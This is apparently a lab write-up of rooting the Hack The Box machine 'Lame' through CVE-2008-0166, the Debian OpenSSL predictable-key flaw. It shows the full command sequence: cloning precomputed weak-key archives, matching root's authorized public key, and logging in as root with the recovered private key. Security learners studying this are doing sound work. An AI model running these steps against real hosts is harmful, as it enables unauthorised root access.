InfoSec LAB

Lame_Privilege_Escalation_2

Created: 3 min read

CVE-2008-0166

a vulnerability classified as critical was found in openssl up to 0.9.8 (Network Encryption Software). Affected by this vulnerability is an unknown code of the component Random Number Generator. The manipulation with an unknown input leads to a cryptographic issues vulnerability. The CWE definition for the vulnerability is CWE-310. As an impact it is known to affect confidentiality.

exploit

This isn’t necessarily an exploit, but rather multiple lists of potential password as a key generator as the vulnerability is present in the random number generator of cryptography engine of OpenSSL

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ git clone https://github.com/g0tmi1k/debian-ssh.git ; cd debian-ssh          
Cloning into 'debian-ssh'...
remote: Enumerating objects: 35, done.
remote: Total 35 (delta 0), reused 0 (delta 0), pack-reused 35
Receiving objects: 100% (35/35), 439.59 MiB | 12.79 MiB/s, done.
Resolving deltas: 100% (8/8), done.
Updating files: 100% (13/13), done.

I copied the repo to Kali

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/lame/debian-ssh]
└─$ ll
total 36K
4.0k drwxr-xr-x 8 kali kali 4.0k apr  5 07:56 .git
4.0k drwxr-xr-x 2 kali kali 4.0k apr  5 07:56 uncommon_keys
4.0k drwxr-xr-x 6 kali kali 4.0k apr  5 07:56 .
4.0k drwxr-xr-x 2 kali kali 4.0k apr  5 07:56 our_tools
4.0k drwxr-xr-x 2 kali kali 4.0k apr  5 07:56 common_keys
 12k -rw-r--r-- 1 kali kali 9.9k apr  5 07:56 README.md
4.0k drwxr-xr-x 4 kali kali 4.0k apr  5 07:55 ..

While there are other stuff here, I will check the common_keys directory as that is what I am hoping to find the matching private SSH key

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ ll
total 77M
4.0k drwxr-xr-x 6 kali kali 4.0k apr  5 07:56 ..
 48m -rw-r--r-- 1 kali kali  48m apr  5 07:56 debian_ssh_rsa_2048_x86.tar.bz2
4.0k drwxr-xr-x 2 kali kali 4.0k apr  5 07:56 .
 30m -rw-r--r-- 1 kali kali  30m apr  5 07:56 debian_ssh_dsa_1024_x86.tar.bz2

Inside, there are 2 archives of potential private SSH keys both in 1024 and 2048 bits. I need to find out what key size the public SSH key used for generation

daemon@lame:/$ ssh-keygen -l -f /root/.ssh/authorized_keys
2048 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a /root/.ssh/authorized_keys

I can do that with the command above. The public SSH key present in the /root/.ssh/authorized_keys file was generated using 2048-bits

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ tar -xf debian_ssh_rsa_2048_x86.tar.bz2

I can then proceed to extract the content of the 2048-bits archive accordingly and check the content

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ grep -r 'AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==' ./rsa/2048
./rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

I got a match. 57c3115d77c56390332dc5c49978627a-5429.pub file has the content matching the Public SSH key. It should have the private counter part; 57c3115d77c56390332dc5c49978627a-5429 I can now just use that private SSH key to SSH directly into the target system.

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ ssh root@$IP -i debian-ssh/common_keys/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 -oHostKeyAlgorithms=+ssh-dss,ssh-rsa
last login: Tue Apr  7 10:33:18 2020 from :0.0
linux lame 2.6.24-16-server #1 smp thu apr 10 13:58:00 UTC 2008 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
to access official ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
 
root@lame:~# whoami
root
root@lame:~# hostname
lame
root@lame:~# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b0:52  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:364197 errors:0 dropped:0 overruns:0 frame:0
          tx packets:7011 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:33735035 (32.1 MB)  TX bytes:966387 (943.7 KB)
          interrupt:19 Base address:0x2024 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:16436  Metric:1
          rx packets:1565 errors:0 dropped:0 overruns:0 frame:0
          tx packets:1565 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:756377 (738.6 KB)  TX bytes:756377 (738.6 KB)

System Level Compromise

Interactive Graph View

Backlinks